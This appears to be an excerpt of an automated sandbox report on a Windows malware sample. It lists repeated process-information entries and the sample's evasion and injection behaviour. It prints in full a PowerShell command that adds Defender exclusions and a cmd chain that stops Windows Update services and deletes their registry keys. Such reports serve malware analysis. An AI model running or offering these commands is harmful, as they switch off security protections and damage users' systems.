    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\schtasks.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    Source: C:\Users\user\Desktop\8iTXwpHCHb.exe | System information queried: FirmwareTableInformation
    Source: C:\Program Files\WindowsServices\WindowsAutHost | System information queried: FirmwareTableInformation
    Source: 8iTXwpHCHb.exe, 00000000.00000002.417944318.000000EDA1DFB000.00000004.00000010.00020000.00000000.sdmp, 8iTXwpHCHb.exe, 00000000.00000002.418282136.000001EE3AB58000.00000004.00000020.00020000.00000000.sdmp, WindowsAutHost, 00000020.00000002.578161862.00000027C2FFB000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
    Source: WindowsAutHost, 00000020.00000002.578694342.0000013605EF8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL4L&
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exe | Special instruction interceptor: First address: 00007FF6D3E06A75 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
    Source: C:\Program Files\WindowsServices\WindowsAutHost | Special instruction interceptor: First address: 00007FF621856A75 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5020 | Thread sleep count: 9647 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5160 | Thread sleep time: -3689348814741908s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1372 | Thread sleep count: 9060 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4184 | Thread sleep time: -3689348814741908s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5896 | Thread sleep count: 7550 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 644 | Thread sleep time: -2767011611056431s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5248 | Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5220 | Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1008 | Thread sleep count: 9026 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3860 | Thread sleep time: -4611686018427385s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2772 | Thread sleep count: 9330 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5500 | Thread sleep time: -2767011611056431s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6020 | Thread sleep count: 820 > 30
    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed
    Source: C:\Program Files\WindowsServices\WindowsAutHost | Dropped PE file which has not been started: C:\Program Files\Google\Libs\WR64.sys
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9647
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9060
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7550
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9026
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9330
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 820
    Source: C:\Windows\System32\conhost.exe | API coverage: 4.8 %
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exe | Process information queried: ProcessInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
    Source: ModuleAnalysisCache.7.drBinary or memory string: Remove-NetEventVmNetworkAdapter
    Source: ModuleAnalysisCache.7.drBinary or memory string: Add-NetEventVmNetworkAdapter
    Source: ModuleAnalysisCache.7.drBinary or memory string: Get-NetEventVmNetworkAdapter
    Source: C:\Windows\System32\conhost.exeCode function: 58_2_00007FF6935D62A0 GetLastError,FormatMessageA,IsDebuggerPresent,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,LocalFree,58_2_00007FF6935D62A0
    Source: C:\Windows\System32\conhost.exeCode function: 58_2_00007FF6935D62A0 GetLastError,FormatMessageA,IsDebuggerPresent,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,LocalFree,58_2_00007FF6935D62A0
    Source: C:\Windows\System32\conhost.exeCode function: 58_2_00007FF6935E1170 GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,58_2_00007FF6935E1170
    Source: C:\Windows\System32\conhost.exeCode function: 58_2_00007FF6935C3C40 GetFileSize,GetProcessHeap,HeapAlloc,58_2_00007FF6935C3C40
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Program Files\WindowsServices\WindowsAutHostProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\conhost.exeCode function: 58_2_00007FF6935C1190 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,malloc,memcpy,_initterm,GetStartupInfoW,58_2_00007FF6935C1190

    HIPS / PFW / Operating System Protection Evasion

    Source: C:\Program Files\WindowsServices\WindowsAutHost | Section loaded: C:\Windows\Temp\34E5.tmp target: C:\Windows\System32\conhost.exe protection: readonly
    Source: C:\Program Files\WindowsServices\WindowsAutHost | Memory written: C:\Windows\System32\conhost.exe base: CBAAEEE010
    Source: C:\Program Files\WindowsServices\WindowsAutHost | Thread register set: target process: 2968
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    Source: C:\Program Files\WindowsServices\WindowsAutHost | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    Source: C:\Program Files\WindowsServices\WindowsAutHost | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exe | Process created: C:\Windows\System32\cmd.exe cmd /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "hklm\system\currentcontrolset\services\usosvc" /f & reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f & reg delete "hklm\system\currentcontrolset\services\wuauserv" /f & reg delete "hklm\system\currentcontrolset\services\bits" /f & reg delete "hklm\system\currentcontrolset\services\dosvc" /f
